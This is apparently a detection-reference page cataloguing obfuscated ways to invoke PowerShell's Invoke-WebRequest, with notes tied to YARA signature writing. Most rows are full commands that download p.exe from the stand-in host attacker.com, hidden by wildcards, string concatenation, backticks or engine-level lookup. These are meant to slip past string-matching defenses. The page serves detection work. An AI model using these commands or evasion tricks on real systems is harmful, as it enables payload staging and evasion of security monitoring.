Invoke-WebRequest
Download files or interact with web services. PowerShell's built-in HTTP client, commonly used for payload staging.
Binary Paths
PowerShell cmdlet (System.Net.WebClient wrapper)
Glob Patterns
| Pattern | Notes |
|---|---|
& (gcm I*oke-W*R*) -Uri http://attacker.com/p.exe -OutFile C:\p.exe
|
Get-Command (gcm) resolves cmdlet by wildcard. I*oke matches Invoke, W*R* matches WebRequest |
& (gcm Inv?ke-WebRequest) -Uri ...
|
Single char wildcard replaces 'o' |
& (gcm I*-W*t) -Uri ...
|
Abbreviated wildcards, still resolves to Invoke-WebRequest |
iwr -Uri ...
|
Built-in alias 'iwr' — not a glob but commonly used obfuscation |
curl -Uri http://attacker.com/p.exe -OutFile C:\p.exe
|
Alias 'curl' for Invoke-WebRequest (Windows PowerShell 5.1 only; removed in PS Core 6+) |
wget -Uri http://attacker.com/p.exe -OutFile C:\p.exe
|
Alias 'wget' for Invoke-WebRequest (Windows PowerShell 5.1 only; removed in PS Core 6+) |
& (Get-Command *Web*quest) -Uri ...
|
Full Get-Command with wildcards around 'Web' |
& (gcm *-WebR*) -Uri ...
|
Wildcard before verb and in noun |
& (gcm Invok[d-f]-WebRequest) -Uri ...
|
Character range matches 'e' in Invoke |
& (gal i?r) -Uri ...
|
Get-Alias with wildcard resolves 'iwr' |
& (DIR Alias:/iw?) -Uri http://attacker.com/p.exe -OutFile C:\p.exe
|
Resolves iwr alias via PowerShell's Alias: PSDrive glob — iw? matches iwr (Invoke-WebRequest) |
& (gcm * | ? Name -match '^Inv.*WebR') -Uri http://attacker.com/p.exe -OutFile C:\p.exe
|
Regex -match filter on all commands via Where-Object pipeline — regex alternative to glob wildcards |
& (gcm ('{0}voke-{1}' -f 'In','WebRequest')) -Uri http://attacker.com/p.exe -OutFile C:\p.exe
|
-f format operator constructs 'Invoke-WebRequest' from string fragments before gcm resolves it |
& (Get-Command -Verb Inv* -Noun *WebRequest) -Uri http://attacker.com/p.exe -OutFile C:\p.exe
|
Get-Command -Verb/-Noun structured split — wildcards on verb and noun independently narrow the match to Invoke-WebRequest |
& ($ExecutionContext.InvokeCommand.GetCommand('I*-WebRequest','Cmdlet')) -Uri http://attacker.com/p.exe -OutFile C:\p.exe
|
Engine-level cmdlet resolution via InvokeCommand.GetCommand — bypasses Get-Command entirely; I*-WebRequest resolves to Invoke-WebRequest |
& (gcm ('Inv'+'oke-We'+'bRequest')) -Uri http://attacker.com/p.exe -OutFile C:\p.exe
|
String concatenation builds the cmdlet name from three fragments — full name never appears contiguous in source |
$c = gcm *-WebR*; & $c -Uri http://attacker.com/p.exe -OutFile C:\p.exe
|
Variable-based invocation — glob resolves to Invoke-WebRequest at assignment time; & invokes the stored CommandInfo object |
& (gcm `I`n`v`o`k`e-WebRequest) -Uri http://attacker.com/p.exe -OutFile C:\p.exe
|
Backtick character insertion — PowerShell ignores backticks before most characters, so the name resolves normally but string-matching signatures miss it |
& (gcm Microsoft.PowerShell.Utility\Inv*-WebR*) -Uri http://attacker.com/p.exe -OutFile C:\p.exe
|
Module-qualified wildcard — forces resolution within Microsoft.PowerShell.Utility while using glob patterns on the cmdlet name |
Pattern Tester
$
Try typing Invoke-WebRequest or a full path like PowerShell cmdlet (System.Net.WebClient wrapper)
YARA Rule
Auto-generated detection rule for Invoke-WebRequest
Platform Notes
PowerShell cmdlet name resolution supports wildcards via Get-Command. The pattern & (gcm Wildcard*Pattern) -Args is idiomatic “globfuscation”. The & operator invokes the resolved cmdlet. Aliases like iwr, curl, wget also resolve to Invoke-WebRequest.